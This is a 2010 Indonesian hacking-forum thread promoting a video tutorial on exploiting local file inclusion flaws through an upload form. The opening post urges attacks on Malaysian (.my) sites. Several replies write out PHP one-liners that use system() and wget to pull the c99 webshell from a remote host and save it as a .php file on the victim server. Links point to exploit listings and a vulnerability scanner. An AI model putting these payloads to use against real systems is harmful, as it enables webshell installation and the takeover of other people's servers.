Page 1 of 3
[video] LFI Local Upload Form
Posted: Tue Apr 27, 2010 4:46 am
by Paman
another video tutorial by AntiSecurity Team
this video still using Tamper Data & /proc/self/environ
but this time we use upload form...
)
big thanks to Vrs-hCk a.k.a ander for the idea ^^
watch the video here
http://pacenoge.org/vid/upload_form.html
download here
http://pacenoge.org/vid/upload_form.swf
upload form script
http://pacenoge.org/tool/upload_form.txt
PS : dicomot abis dari evilc0.de
ketemu site .id PATCH!!!
ketemu site .my SIKAT!!!
Greets:
evilc0.de
antisecurity.org
serverisdown.org
mainhack.net
YOU!
Re: [video] LFI Local Upload Form
Posted: Tue Apr 27, 2010 7:00 am
by 3xtr3m3b0y
Really Nice Idea, jd kelihatan lebih ELEGAN dibanding langsung nanem script buat akses shell.
Makasih infox Paman...
Pamanku mmg org yg baik hati dan suka menabung... :kaca:
Hanya sj jaman skrg Vuln LFI sdh langka banget, jd praktekx di Local Server aja...
Re: [video] LFI Local Upload Form
Posted: Tue Apr 27, 2010 10:28 am
by dark_superman
wow keren kak
ijin coba dulue
malasya i'm coming :ngakak: :ngakak:
Re: [video] LFI Local Upload Form
Posted: Tue Apr 27, 2010 9:27 pm
by Paman
LFI sangat bertabur ...
bisa di coba di liat bugs nya di link berikut :
http://www.exploit-db.com/author/AntiSecurity
Re: [video] LFI Local Upload Form
Posted: Tue Apr 27, 2010 9:55 pm
by tey
hohoo mantap jaya neh....thx pak :love:
Re: [video] LFI Local Upload Form
Posted: Tue Apr 27, 2010 10:36 pm
by wiLMaR_kiDz
weww.....
iya neh, baru tau juga ane...
cz emg LFI stau ane emg jarang bgt ktemu vulnnya..
thankz for sharing paman jack.....
*Nb: btw, thread ane yg kmren2 di 1337 kyanya ada yg gak beres deh om.pdahal blom slesai.hmm...maling emg sh*t.. ;(
Re: [video] LFI Local Upload Form
Posted: Wed Apr 28, 2010 8:07 am
by 3xtr3m3b0y
sebenerx klo fungsi system,exec,shell_exec diaktifkan di mesin itu, bisa jg kan langsung tumpangin skrip buat ngedownload webshell.
<? system('wget
http://www.source.com/c99.txt'); ?>
<? system('mv c99.txt c99.php'); ?>
Re: [video] LFI Local Upload Form
Posted: Wed Apr 28, 2010 6:04 pm
by Paman
3xtr3m3b0y wrote:sebenerx klo fungsi system,exec,shell_exec diaktifkan di mesin itu, bisa jg kan langsung tumpangin skrip buat ngedownload webshell.
<? system('wget
http://www.source.com/c99.txt'); ?>
<? system('mv c99.txt c99.php'); ?>
lebih gampang : <? system('wget
http://www.source.com/c99.txt -O nenen.php'); ?>
yakin lah.. karena 1 baris command pun sangat berharga,.. eh bukan.. tapi karena saya suka nenen ^^v
hsuiahsiuahsiuahsiuahsa
Re: [video] LFI Local Upload Form
Posted: Wed Apr 28, 2010 6:18 pm
by 3xtr3m3b0y
Paman wrote:3xtr3m3b0y wrote:sebenerx klo fungsi system,exec,shell_exec diaktifkan di mesin itu, bisa jg kan langsung tumpangin skrip buat ngedownload webshell.
<? system('wget
http://www.source.com/c99.txt'); ?>
<? system('mv c99.txt c99.php'); ?>
lebih gampang : <? system('wget
http://www.source.com/c99.txt -O nenen.php'); ?>
yakin lah.. karena 1 baris command pun sangat berharga,.. eh bukan.. tapi karena saya suka nenen ^^v
hsuiahsiuahsiuahsiuahsa
Nyang penting bukan nenen cucu basi aja Paman (Red: susu nenek2) :devil
Makasih banyak pencerahanx Paman...
Re: [video] LFI Local Upload Form
Posted: Thu Apr 29, 2010 3:15 am
by Paman
karena saya yakin situ sudah putus asa dengan mendengar target LFI..
silahkan di lanjut kan dengan membaca post dari AntiSecurity berikut dan mencoba nya
http://antisecurity.org/0x99/vopcrew-ijo-scanner.html
ijo kk ijo..
semua itu tergantung face [NoGe]
real big thanks to
AntiSecurity.org + serverISdown.org + MainHack BrotherHood